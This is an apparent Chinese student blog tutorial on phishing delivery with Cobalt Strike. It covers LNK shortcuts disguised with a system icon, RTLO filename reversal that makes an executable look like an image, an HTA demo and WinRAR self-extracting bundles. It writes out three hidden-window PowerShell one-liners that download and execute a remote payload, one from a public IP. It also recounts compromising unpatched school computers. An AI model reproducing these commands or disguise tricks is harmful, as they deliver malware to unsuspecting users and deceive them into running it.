钓鱼(一)
前言
本来是给协会招新的时候介绍的,结果深圳疫情改上网课了,计划泡汤但是还是把学到的东西简单记录一下。
本篇全部用cs演示
LNK快捷方式
lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
生成钓鱼链接
生成
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.239.56:80/a'))"
创建快捷方式
更改图标进行伪装
%SystemRoot%\System32\SHELL32.dll
双击就上线了
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.111.128:80/a'))"
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://8.129.42.140:1234/a'))"
RTLO反转文件名
RTLO 字符全名为 “RIGHT-TO-LEFT OVERRIDE”,其本质是 unicode 字符。可以将任意语言的文字内容按倒序排列,最初是用来支持一些从右往左写的语言的文字,比如阿拉伯语,希伯来语。由于它可以重新排列字符的特性,会被攻击者利用从而达到欺骗目标
不过注意它不支持下划线
比如把这个文件重命名,重命名为abc.exe,将abc.exe(.scr等同于.exe)重命名为 abcgpj.exe,然后再次重命名,在c和g中右键选择RLO即可
效果
HTA (待完成)
HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,本身就是html应用程序,双击就能运行,却比普通网页权限大得多,它具有桌面程序的所有权限,与VB、C++等程序语言所设计的软件界面没什么差别。
新建一个后缀为 .hta的HTA,输入以下
<!--example1.hta-->
<html>
<head>
<title>test</title>
<style>
p{
font-size:24;
cursor:hand}
</style>
</head>
<body>
<center>
<p>
HTA
HTMLApplication
test
</p>
</center>
</body>
</html>
运行
CS可以直接生成
自解压捆绑
将CS的马和正常软件,利用winrar进行压缩
之后可以生成自解压捆绑压缩包
但是实操发现大部分win10都可以发现(没解压就发现病毒了),尽管关闭防火墙,系统内核检测到rce行为也会重启计算机
但是学校的win8不会,hhhh
复现成功截图如下
所以说学校的电脑挺拉的,一没杀软二没补丁三版本还老
冲呀
冲呀